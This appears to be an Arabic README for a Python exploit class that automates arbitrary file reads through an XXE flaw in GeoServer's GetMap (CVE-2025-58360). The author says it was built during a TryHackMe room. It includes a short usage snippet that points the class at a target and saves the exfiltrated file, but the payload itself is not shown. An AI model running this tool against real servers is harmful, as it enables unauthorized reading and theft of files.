
فئة استغلال بلغة Python لـ CVE-2025-58360، وهي ثغرة XXE في وظيفة GetMap الخاصة بـ GeoServer تتيح قراءة ملفات عشوائية. تتضمن استغلالًا آليًا وسرقة بيانات.
الكود والمعلومات الواردة في هذا المستودع مخصصة للأغراض التعليمية والبحثية فقط. لا يتحمل مالك المستودع أي مسؤولية عن أي شيء تفعله بالكود و/أو المعلومات الواردة في هذا المستودع. أفعالك هي مسؤوليتك وحدك. يرجى استخدام هذا بشكل قانوني ومسؤول.
تقوم فئة Python3 الموجودة في ملف exploit/exploiter.py (GeoDumper) بأتمتة استغلال ثغرة XXE وتحفظ المعلومات المسربة في ملف محلي.
مثال:
import exploit.exploiter as exploiter
target_ip = "localhost"
secure = False
geoserver_path = "geoserver"
dumper = exploiter.GeoDumper(target_ip=target_ip, geoserver_path=geoserver_path, is_secure=secure)
(data, filename) = dumper.dump_file(target_file)
print(f"[+] data saved to \"{filename}\"")
print(f"[+] Data:\n{data.decode("utf-8")}")
تستغل الثغرة المعنية إدخال XML غير منقّح بشكل صحيح إلى دالة GetMap، مما يؤدي إلى قراءة ملفات عشوائية من قبل المهاجم.
يمكن العثور على مزيد من المعلومات وتحليلات/تفصيلات أفضل للثغرة في الروابط أدناه.
ملاحظة: لم أكتشف الثغرة أو أقوم بأي بحث متعلق بها. تم إنشاء هذا الكود والمستودع أثناء قيامي بالغرفة المرتبطة على TryHackMe.